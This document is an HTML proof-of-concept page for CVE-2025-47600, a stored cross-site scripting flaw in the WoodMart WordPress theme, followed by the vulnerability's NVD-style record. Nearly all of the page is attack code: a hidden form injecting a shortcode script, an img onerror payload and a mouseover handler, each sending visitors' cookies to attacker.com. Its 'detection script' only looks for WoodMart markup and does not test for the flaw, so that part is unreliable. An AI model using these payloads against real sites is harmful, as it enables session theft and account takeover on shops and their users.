CVE-2025-47600

<!-- WoodMart Theme XSS PoC - CVE-2025-47600 --> <!-- This PoC demonstrates the stored XSS vulnerability in WoodMart theme shortcode functionality --> <!DOCTYPE html> <html> <head> <title>WoodMart XSS PoC - CVE-2025-47600</title> </head> <body> <h1>CVE-2025-47600 - WoodMart Theme XSS Vulnerability PoC</h1> <h2>Attack Vector 1: Malicious Shortcode Injection</h2> <form action="https://target-site.com/" method="POST"> <!-- WoodMart shortcode with embedded XSS payload --> <input type="hidden" name="shortcode_content" value="[woodmart_title]\n<script>\n // Steal session cookies var cookies = document.cookie; fetch('https://attacker.com/steal?c=' + btoa(cookies)); </script>\n[/woodmart_title]"> <button type="submit">Submit Malicious Shortcode</button> </form> <h2>Attack Vector 2: Direct Script Injection via Title/Content Fields</h2> <script> // Payload: <img src=x onerror="alert('XSS Triggered - CVE-2025-47600')"> // This payload can be injected into WoodMart title or content fields function demonstrateXSS() { // Simulating the XSS payload that gets stored var payload = '<img src=x onerror="alert(\'CVE-2025-47600 XSS\');document.location=\'https://attacker.com/cookie?c=\'+document.cookie">'; console.log('XSS Payload:', payload); return payload; } </script> <h2>Attack Vector 3: Event Handler Based XSS</h2> <div onmouseover="fetch('https://attacker.com/log?data='+document.cookie)"> Hover over this element to trigger XSS </div> <h2>Detection Script</h2> <script> // Check if WoodMart theme is vulnerable function checkVulnerability() { var woodmartElements = document.querySelectorAll('[class*="woodmart"]'); if (woodmartElements.length > 0) { console.log('WoodMart theme detected'); // Attempt to detect if the page is vulnerable var scripts = document.getElementsByTagName('script'); for (var i = 0; i < scripts.length; i++) { if (scripts[i].src.includes('woodmart')) { console.log('WoodMart scripts found - potential vulnerability'); return true; } } } return false; } checkVulnerability(); </script> </body> </html>

{"cve": {"id": "CVE-2025-47600", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:54.893", "lastModified": "2026-04-27T19:16:14.217", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in xtemos WoodMart woodmart allows Code Injection.This issue affects WoodMart: from n/a through <= 8.3.7."}, {"lang": "es", "value": "Neutralización Incorrecta de Etiquetas HTML Relacionadas con Scripts en una Página Web (XSS Básico) vulnerabilidad en xtemos WoodMart woodmart permite la Inyección de Código. Este problema afecta a WoodMart: desde n/a hasta &lt;= 8.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/woodmart/vulnerability/wordpress-woodmart-theme-8-3-7-arbitrary-shortcode-execution-vulnerability?_s_id=cve", "source": "[email protected]"}]}}